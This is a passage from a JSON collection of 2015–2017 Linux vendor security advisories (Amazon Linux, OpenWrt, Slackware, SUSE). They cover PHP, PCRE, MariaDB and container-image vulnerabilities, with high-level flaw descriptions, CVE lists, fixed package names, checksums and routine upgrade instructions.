__](<https://access.redhat.com/security/cve/CVE-2015-4021>))\n\nAn integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. ([CVE-2015-4022 __](<https://access.redhat.com/security/cve/CVE-2015-4022>))\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. ([CVE-2015-4024 __](<https://access.redhat.com/security/cve/CVE-2015-4024>))\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. ([CVE-2015-4025 __](<https://access.redhat.com/security/cve/CVE-2015-4025>))\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. ([CVE-2015-4026 __](<https://access.redhat.com/security/cve/CVE-2015-4026>))\n\nPCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. ([CVE-2015-2325 __](<https://access.redhat.com/security/cve/CVE-2015-2325>))\n\nPCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. ([CVE-2015-2326 __](<https://access.redhat.com/security/cve/CVE-2015-2326>))\n\n \n**Affected Packages:** \n\n\nphp56\n\n \n**Issue Correction:** \nRun _yum update php56_ to update your system. \n\n \n**New Packages:**\n \n \n i686: \n php56-ldap-5.6.9-1.112.amzn1.i686 \n php56-bcmath-5.6.9-1.112.amzn1.i686 \n php56-cli-5.6.9-1.112.amzn1.i686 \n php56-intl-5.6.9-1.112.amzn1.i686 \n php56-devel-5.6.9-1.112.amzn1.i686 \n php56-common-5.6.9-1.112.amzn1.i686 \n php56-imap-5.6.9-1.112.amzn1.i686 \n php56-gd-5.6.9-1.112.amzn1.i686 \n php56-mysqlnd-5.6.9-1.112.amzn1.i686 \n php56-mssql-5.6.9-1.112.amzn1.i686 \n php56-enchant-5.6.9-1.112.amzn1.i686 \n php56-debuginfo-5.6.9-1.112.amzn1.i686 \n php56-process-5.6.9-1.112.amzn1.i686 \n php56-fpm-5.6.9-1.112.amzn1.i686 \n php56-pdo-5.6.9-1.112.amzn1.i686 \n php56-odbc-5.6.9-1.112.amzn1.i686 \n php56-xml-5.6.9-1.112.amzn1.i686 \n php56-mcrypt-5.6.9-1.112.amzn1.i686 \n php56-recode-5.6.9-1.112.amzn1.i686 \n php56-dba-5.6.9-1.112.amzn1.i686 \n php56-xmlrpc-5.6.9-1.112.amzn1.i686 \n php56-pgsql-5.6.9-1.112.amzn1.i686 \n php56-mbstring-5.6.9-1.112.amzn1.i686 \n php56-pspell-5.6.9-1.112.amzn1.i686 \n php56-5.6.9-1.112.amzn1.i686 \n php56-embedded-5.6.9-1.112.amzn1.i686 \n php56-gmp-5.6.9-1.112.amzn1.i686 \n php56-soap-5.6.9-1.112.amzn1.i686 \n php56-opcache-5.6.9-1.112.amzn1.i686 \n php56-tidy-5.6.9-1.112.amzn1.i686 \n php56-snmp-5.6.9-1.112.amzn1.i686 \n php56-dbg-5.6.9-1.112.amzn1.i686 \n \n src: \n php56-5.6.9-1.112.amzn1.src \n \n x86_64: \n php56-enchant-5.6.9-1.112.amzn1.x86_64 \n php56-gmp-5.6.9-1.112.amzn1.x86_64 \n php56-mysqlnd-5.6.9-1.112.amzn1.x86_64 \n php56-imap-5.6.9-1.112.amzn1.x86_64 \n php56-pgsql-5.6.9-1.112.amzn1.x86_64 \n php56-common-5.6.9-1.112.amzn1.x86_64 \n php56-5.6.9-1.112.amzn1.x86_64 \n php56-soap-5.6.9-1.112.amzn1.x86_64 \n php56-intl-5.6.9-1.112.amzn1.x86_64 \n php56-debuginfo-5.6.9-1.112.amzn1.x86_64 \n php56-opcache-5.6.9-1.112.amzn1.x86_64 \n php56-embedded-5.6.9-1.112.amzn1.x86_64 \n php56-dba-5.6.9-1.112.amzn1.x86_64 \n php56-tidy-5.6.9-1.112.amzn1.x86_64 \n php56-mssql-5.6.9-1.112.amzn1.x86_64 \n php56-fpm-5.6.9-1.112.amzn1.x86_64 \n php56-snmp-5.6.9-1.112.amzn1.x86_64 \n php56-ldap-5.6.9-1.112.amzn1.x86_64 \n php56-dbg-5.6.9-1.112.amzn1.x86_64 \n php56-bcmath-5.6.9-1.112.amzn1.x86_64 \n php56-xmlrpc-5.6.9-1.112.amzn1.x86_64 \n php56-process-5.6.9-1.112.amzn1.x86_64 \n php56-gd-5.6.9-1.112.amzn1.x86_64 \n php56-devel-5.6.9-1.112.amzn1.x86_64 \n php56-mbstring-5.6.9-1.112.amzn1.x86_64 \n php56-recode-5.6.9-1.112.amzn1.x86_64 \n php56-mcrypt-5.6.9-1.112.amzn1.x86_64 \n php56-pspell-5.6.9-1.112.amzn1.x86_64 \n php56-pdo-5.6.9-1.112.amzn1.x86_64 \n php56-odbc-5.6.9-1.112.amzn1.x86_64 \n php56-cli-5.6.9-1.112.amzn1.x86_64 \n php56-xml-5.6.9-1.112.amzn1.x86_64 \n \n \n", "published": "2015-06-02T22:22:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://alas.aws.amazon.com/ALAS-2015-536.html", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "lastseen": "2016-09-28T21:04:10"}, {"id": "ALAS-2015-535", "type": "amazon", "title": "Medium: php55", "description": "**Issue Overview:**\n\nAn integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. ([CVE-2015-4021 __](<https://access.redhat.com/security/cve/CVE-2015-4021>))\n\nAn integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. ([CVE-2015-4022 __](<https://access.redhat.com/security/cve/CVE-2015-4022>))\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. ([CVE-2015-4024 __](<https://access.redhat.com/security/cve/CVE-2015-4024>))\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. ([CVE-2015-4025 __](<https://access.redhat.com/security/cve/CVE-2015-4025>))\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. ([CVE-2015-4026 __](<https://access.redhat.com/security/cve/CVE-2015-4026>))\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system. \n\n \n**New Packages:**\n \n \n i686: \n php55-xml-5.5.25-1.101.amzn1.i686 \n php55-soap-5.5.25-1.101.amzn1.i686 \n php55-dba-5.5.25-1.101.amzn1.i686 \n php55-imap-5.5.25-1.101.amzn1.i686 \n php55-pspell-5.5.25-1.101.amzn1.i686 \n php55-gd-5.5.25-1.101.amzn1.i686 \n php55-intl-5.5.25-1.101.amzn1.i686 \n php55-opcache-5.5.25-1.101.amzn1.i686 \n php55-tidy-5.5.25-1.101.amzn1.i686 \n php55-fpm-5.5.25-1.101.amzn1.i686 \n php55-mssql-5.5.25-1.101.amzn1.i686 \n php55-enchant-5.5.25-1.101.amzn1.i686 \n php55-mysqlnd-5.5.25-1.101.amzn1.i686 \n php55-cli-5.5.25-1.101.amzn1.i686 \n php55-pdo-5.5.25-1.101.amzn1.i686 \n php55-5.5.25-1.101.amzn1.i686 \n php55-devel-5.5.25-1.101.amzn1.i686 \n php55-snmp-5.5.25-1.101.amzn1.i686 \n php55-xmlrpc-5.5.25-1.101.amzn1.i686 \n php55-mcrypt-5.5.25-1.101.amzn1.i686 \n php55-recode-5.5.25-1.101.amzn1.i686 \n php55-common-5.5.25-1.101.amzn1.i686 \n php55-bcmath-5.5.25-1.101.amzn1.i686 \n php55-debuginfo-5.5.25-1.101.amzn1.i686 \n php55-embedded-5.5.25-1.101.amzn1.i686 \n php55-odbc-5.5.25-1.101.amzn1.i686 \n php55-mbstring-5.5.25-1.101.amzn1.i686 \n php55-ldap-5.5.25-1.101.amzn1.i686 \n php55-pgsql-5.5.25-1.101.amzn1.i686 \n php55-gmp-5.5.25-1.101.amzn1.i686 \n php55-process-5.5.25-1.101.amzn1.i686 \n \n src: \n php55-5.5.25-1.101.amzn1.src \n \n x86_64: \n php55-mbstring-5.5.25-1.101.amzn1.x86_64 \n php55-5.5.25-1.101.amzn1.x86_64 \n php55-xmlrpc-5.5.25-1.101.amzn1.x86_64 \n php55-cli-5.5.25-1.101.amzn1.x86_64 \n php55-recode-5.5.25-1.101.amzn1.x86_64 \n php55-devel-5.5.25-1.101.amzn1.x86_64 \n php55-gmp-5.5.25-1.101.amzn1.x86_64 \n php55-enchant-5.5.25-1.101.amzn1.x86_64 \n php55-process-5.5.25-1.101.amzn1.x86_64 \n php55-pgsql-5.5.25-1.101.amzn1.x86_64 \n php55-debuginfo-5.5.25-1.101.amzn1.x86_64 \n php55-gd-5.5.25-1.101.amzn1.x86_64 \n php55-soap-5.5.25-1.101.amzn1.x86_64 \n php55-intl-5.5.25-1.101.amzn1.x86_64 \n php55-ldap-5.5.25-1.101.amzn1.x86_64 \n php55-odbc-5.5.25-1.101.amzn1.x86_64 \n php55-xml-5.5.25-1.101.amzn1.x86_64 \n php55-pspell-5.5.25-1.101.amzn1.x86_64 \n php55-opcache-5.5.25-1.101.amzn1.x86_64 \n php55-dba-5.5.25-1.101.amzn1.x86_64 \n php55-embedded-5.5.25-1.101.amzn1.x86_64 \n php55-tidy-5.5.25-1.101.amzn1.x86_64 \n php55-mssql-5.5.25-1.101.amzn1.x86_64 \n php55-snmp-5.5.25-1.101.amzn1.x86_64 \n php55-common-5.5.25-1.101.amzn1.x86_64 \n php55-imap-5.5.25-1.101.amzn1.x86_64 \n php55-fpm-5.5.25-1.101.amzn1.x86_64 \n php55-mysqlnd-5.5.25-1.101.amzn1.x86_64 \n php55-pdo-5.5.25-1.101.amzn1.x86_64 \n php55-bcmath-5.5.25-1.101.amzn1.x86_64 \n php55-mcrypt-5.5.25-1.101.amzn1.x86_64 \n \n \n", "published": "2015-06-02T22:21:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://alas.aws.amazon.com/ALAS-2015-535.html", "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "lastseen": "2016-09-28T21:03:59"}], "openwrt": [{"id": "OPENWRT-SA-000002", "type": "openwrt", "title": "php: Security update (7 CVEs)", "description": "The php package has been rebuilt and was uploaded to the Chaos Calmer\n15.05 repository due to multiple security issues.\n\n\nVERSION\n\n5.6.8-1 => 5.6.17-1\n\n\nCHANGELOG\n\n[Sun, 24 Jan 2016 21:47:52 +0100 18d121b]\n\nUpdate to 5.6.17\n\nFixes CVE-2016-1903.\n\n[Wed, 23 Dec 2015 16:00:14 -0500 766cfcc]\n\nUpdate to 5.6.16\n\n[Wed, 23 Dec 2015 16:00:04 -0500 41f541b]\n\nUpdate to 5.6.15\n\n[Wed, 23 Dec 2015 15:59:54 -0500 0df349f]\n\nUpdate to 5.6.14\n\n[Wed, 23 Dec 2015 15:59:43 -0500 196b622]\n\nUpdate to 5.6.13\n\n[Wed, 23 Dec 2015 15:59:32 -0500 1cbcdf7]\n\nFix the two different maintainer fields into one (fixes #1688)\n\n[Wed, 23 Dec 2015 15:59:21 -0500 9bbdad4]\n\nUpdate to 5.6.12\n\n[Wed, 23 Dec 2015 15:59:10 -0500 6cba0bf]\n\nThis fixes the following CVEs:\n - in PCRE: CVE-2015-2325, CVE-2015-2326\n - in sqlite3: CVE-2015-3414, CVE-2015-3415, CVE-2015-3416\n\n[Wed, 23 Dec 2015 15:58:46 -0500 559df39]\n\nThis fixes CVE-2006-7243, a multipart/form-data remote dos\nvulnerability, a heap buffer overflow in unpack and a integer overflow\nin ftp_genlist, which also results in a heap overflow. For more details,\nsee http://php.net/ChangeLog-5.php#5.6.9\n\nAlso sync the timezone patch with latest version from Debian and adopt\nthis patch for the changes in this php release.\n\nRefresh 950-Fix-dl-cross-compiling-issue.patch.\n\n[Wed, 23 Dec 2015 15:58:27 -0500 f0a0448]\n\nThis patch adds build infrastructure for PHP's OPcache extension.\nCompared with the other extension, this is a Zend module and it need a\nlittle workaround during cross-compiling.\n\n[Wed, 23 Dec 2015 15:57:57 -0500 f04165e]\n\nPecl: move phpize into prepare stage\n\nThis allows pecl modules to rely on PKG_FIXUP:=autoreconf.\n\n\nCHANGES\n\n lang/php5/Makefile | 24 ++-\n lang/php5/files/php.ini | 10 ++\n ...bian_patches_use_embedded_timezonedb.patch | 136 ++++++++------\n ...xt-opcache-fix-detection-of-shm-mmap.patch | 159 +++++++++++++++++\n .../950-Fix-dl-cross-compiling-issue.patch | 23 ++-\n lang/php5/pecl.mk | 7 +-\n 6 files changed, 277 insertions(+), 82 deletions(-)", "published": "2016-01-28T12:23:45", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://lists.openwrt.org/pipermail/openwrt-security-announce/2016-January/000002.html", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2016-1903", "CVE-2006-7243", "CVE-2015-3416", "CVE-2015-3414", "CVE-2015-2326"], "lastseen": "2016-09-26T15:45:23"}], "slackware": [{"id": "SSA-2015-198-02", "type": "slackware", "title": "php", "description": "New php packages are available for Slackware 14.0, 14.1, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/php-5.4.43-i486-1_slack14.1.txz: Upgraded.\n This update fixes some bugs and security issues.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3414\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3415\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3416\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4642\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4643\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4644\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.43-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.43-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.43-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.43-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.11-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.11-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\nf34f96584f242735830b866d3daf7cef php-5.4.43-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n8271dca3b5409ce7b73d30628aa0ace4 php-5.4.43-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n6eb81ab4a6f09e4a8b4d4d5e7cbbda57 php-5.4.43-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n3a4a3f2d94af2fafb2a624d4c83c9ca3 php-5.4.43-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n020ea5fa030e4970859f79c598a1e9b5 n/php-5.6.11-i586-1.txz\n\nSlackware x86_64 -current package:\n681ed93dadf75420ca2ee5d03b369da0 n/php-5.6.11-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.4.43-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "published": "2015-07-17T13:25:21", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.420251", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2015-4644", "CVE-2015-4642", "CVE-2015-3416", "CVE-2015-3152", "CVE-2015-3414", "CVE-2015-4643", "CVE-2015-2326"], "lastseen": "2018-02-02T18:11:39"}, {"id": "SSA-2015-162-02", "type": "slackware", "title": "php", "description": "New php packages are available for Slackware 14.0, 14.1, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/php-5.4.41-i486-1_slack14.1.txz: Upgraded.\n This update fixes some bugs and security issues.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7243\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.41-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.41-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.41-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.41-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.9-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.9-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n5e8d107dba11f8c87693edfdc32f56b7 php-5.4.41-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n24d6895fe6b0e9c88b04ceaccc35383d php-5.4.41-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n52011eec3a256a365789562b63e8ba84 php-5.4.41-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n82b75af6253121cab6cc84dd714f554c php-5.4.41-x86_64-1_slack14.1.txz\n\nSlackware -current package:\ne1c64f133f44b0abac21e0846e39d3c8 n/php-5.6.9-i586-1.txz\n\nSlackware x86_64 -current package:\nae51c99af34a4bd8721e7140c38a8c1a n/php-5.6.9-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.4.41-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "published": "2015-06-11T16:01:25", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.414774", "cvelist": ["CVE-2015-2325", "CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "lastseen": "2018-02-02T18:11:31"}], "suse": [{"id": "SUSE-SU-2015:1273-1", "type": "suse", "title": "Security update for mariadb (important)", "description": "This update fixes the following security issues:\n * Logjam attack: mysql uses 512 bit dh groups in SSL [bnc#934789]\n * CVE-2015-3152: mysql --ssl does not enforce SSL [bnc#924663]\n * CVE-2014-8964: heap buffer overflow [bnc#906574]\n * CVE-2015-2325: heap buffer overflow in compile_branch() [bnc#924960]\n * CVE-2015-2326: heap buffer overflow in pcre_compile2() [bnc#924961]\n * CVE-2015-0501: unspecified vulnerability related to Server:Compiling\n (CPU April 2015)\n * CVE-2015-2571: unspecified vulnerability related to Server:Optimizer\n (CPU April 2015)\n * CVE-2015-0505: unspecified vulnerability related to Server:DDL (CPU\n April 2015)\n * CVE-2015-0499: unspecified vulnerability related to Server:Federated\n (CPU April 2015)\n * CVE-2015-2568: unspecified vulnerability related to\n Server:Security:Privileges (CPU April 2015)\n * CVE-2015-2573: unspecified vulnerability related to Server:DDL (CPU\n April 2015)\n * CVE-2015-0433: unspecified vulnerability related to\n Server:InnoDB:DML (CPU April 2015)\n * CVE-2015-0441: unspecified vulnerability related to\n Server:Security:Encryption (CPU April 2015)\n\n", "published": "2015-07-21T16:08:23", "cvss": {"score": 5.7, "vector": "AV:NETWORK/AC:MEDIUM/Au:MULTIPLE_INSTANCES/C:NONE/I:NONE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00036.html", "cvelist": ["CVE-2015-2325", "CVE-2015-2568", "CVE-2015-0501", "CVE-2015-2571", "CVE-2014-8964", "CVE-2015-3152", "CVE-2015-0499", "CVE-2015-0433", "CVE-2015-0441", "CVE-2015-0505", "CVE-2015-2573", "CVE-2015-2326"], "lastseen": "2016-09-04T11:28:41"}, {"id": "OPENSUSE-SU-2015:1216-1", "type": "suse", "title": "Security update for MariaDB (important)", "description": "MariaDB was updated to its current minor version, fixing bugs and security\n issues.\n\n These updates include a fix for Logjam (CVE-2015-4000), making MariaDB\n work with client software that no longer allows short DH groups over SSL,\n as e.g.\n our current openssl packages.\n\n On openSUSE 13.1, MariaDB was updated to 5.5.44.\n\n On openSUSE 13.2, MariaDB was updated from 10.0.13 to 10.0.20.\n\n Please read the release notes of MariaDB\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10020-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10020-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10019-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10019-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10018-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10018-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10017-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10017-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10016-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10016-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10015-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10015-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10014-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10014-release-notes/</a> for more\n information.\n\n", "published": "2015-07-09T17:08:05", "cvss": {"score": 8.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00020.html", "cvelist": ["CVE-2015-4000", "CVE-2014-6500", "CVE-2015-2325", "CVE-2015-2568", "CVE-2014-6507", "CVE-2014-6469", "CVE-2015-0501", "CVE-2015-0432", "CVE-2014-6496", "CVE-2014-6555", "CVE-2015-2571", "CVE-2014-6559", "CVE-2014-8964", "CVE-2014-6464", "CVE-2015-3152", "CVE-2015-0382", "CVE-2015-0374", "CVE-2014-6491", "CVE-2015-0499", "CVE-2015-0433", "CVE-2015-0441", "CVE-2014-6568", "CVE-2015-0505", "CVE-2015-2573", "CVE-2014-6494", "CVE-2015-2326", "CVE-2015-0411", "CVE-2015-0381"], "lastseen": "2016-09-04T11:56:36"}, {"id": "SUSE-SU-2017:2699-1", "type": "suse", "title": "Security update for SLES 12 Docker image (important)", "description": "The SUSE Linux Enterprise Server 12 container image has been updated to\n include security and stability fixes.\n\n The following issues related to building of the container images have been\n fixed:\n\n - Included krb5 package to avoid the inclusion of krb5-mini which gets\n selected as a dependency by the Build Service solver. (bsc#1056193)\n - Do not install recommended packages when building container images.\n (bsc#975726)\n\n A number of security issues that have been already fixed by updates\n released for SUSE Linux Enterprise Server 12 are now included in the base\n image. A package/CVE cross-reference is available below.\n\n pam:\n\n - CVE-2015-3238\n\n libtasn1:\n\n - CVE-2015-3622\n - CVE-2016-4008\n\n libidn:\n\n - CVE-2015-2059\n - CVE-2015-8948\n - CVE-2016-6261\n - CVE-2016-6262\n - CVE-2016-6263\n\n zlib:\n\n - CVE-2016-9840\n - CVE-2016-9841\n - CVE-2016-9842\n - CVE-2016-9843\n\n curl:\n\n - CVE-2016-5419\n - CVE-2016-5420\n - CVE-2016-5421\n - CVE-2016-7141\n - CVE-2016-7167\n - CVE-2016-8615\n - CVE-2016-8616\n - CVE-2016-8617\n - CVE-2016-8618\n - CVE-2016-8619\n - CVE-2016-8620\n - CVE-2016-8621\n - CVE-2016-8622\n - CVE-2016-8623\n - CVE-2016-8624\n - CVE-2016-9586\n - CVE-2017-1000100\n - CVE-2017-1000101\n - CVE-2017-7407\n\n openssl:\n\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2177\n - CVE-2016-2178\n - CVE-2016-2179\n - CVE-2016-2180\n - CVE-2016-2181\n - CVE-2016-2182\n - CVE-2016-2183\n - CVE-2016-6302\n - CVE-2016-6303\n - CVE-2016-6304\n - CVE-2016-6306\n\n libxml2:\n\n - CVE-2014-0191\n - CVE-2015-8806\n - CVE-2016-1762\n - CVE-2016-1833\n - CVE-2016-1834\n - CVE-2016-1835\n - CVE-2016-1837\n - CVE-2016-1838\n - CVE-2016-1839\n - CVE-2016-1840\n - CVE-2016-2073\n - CVE-2016-3627\n - CVE-2016-3705\n - CVE-2016-4447\n - CVE-2016-4448\n - CVE-2016-4449\n - CVE-2016-4483\n - CVE-2016-4658\n - CVE-2016-9318\n - CVE-2016-9597\n - CVE-2017-9047\n - CVE-2017-9048\n - CVE-2017-9049\n - CVE-2017-9050\n\n util-linux:\n\n - CVE-2015-5218\n - CVE-2016-5011\n - CVE-2017-2616\n\n cracklib:\n\n - CVE-2016-6318\n\n systemd:\n\n - CVE-2014-9770\n - CVE-2015-8842\n - CVE-2016-7796\n\n pcre:\n\n - CVE-2014-8964\n - CVE-2015-2325\n - CVE-2015-2327\n - CVE-2015-2328\n - CVE-2015-3210\n - CVE-2015-3217\n - CVE-2015-5073\n - CVE-2015-8380\n - CVE-2015-8381\n - CVE-2015-8382\n - CVE-2015-8383\n - CVE-2015-8384\n - CVE-2015-8385\n - CVE-2015-8386\n - CVE-2015-8387\n - CVE-2015-8388\n - CVE-2015-8389\n - CVE-2015-8390\n - CVE-2015-8391\n - CVE-2015-8392\n - CVE-2015-8393\n - CVE-2015-8394\n - CVE-2015-8395\n - CVE-2016-1283\n - CVE-2016-3191\n\n appamor:\n\n - CVE-2017-6507\n\n bash:\n\n - CVE-2014-6277\n - CVE-2014-6278\n - CVE-2016-0634\n - CVE-2016-7543\n\n cpio:\n\n - CVE-2016-2037\n\n glibc:\n\n - CVE-2016-1234\n - CVE-2016-3075\n - CVE-2016-3706\n - CVE-2016-4429\n - CVE-2017-1000366\n\n perl:\n\n - CVE-2015-8853\n - CVE-2016-1238\n - CVE-2016-2381\n - CVE-2016-6185\n\n libssh2_org:\n\n - CVE-2016-0787\n\n expat:\n\n - CVE-2012-6702\n - CVE-2015-1283\n - CVE-2016-0718\n - CVE-2016-5300\n - CVE-2016-9063\n - CVE-2017-9233\n\n ncurses:\n\n - 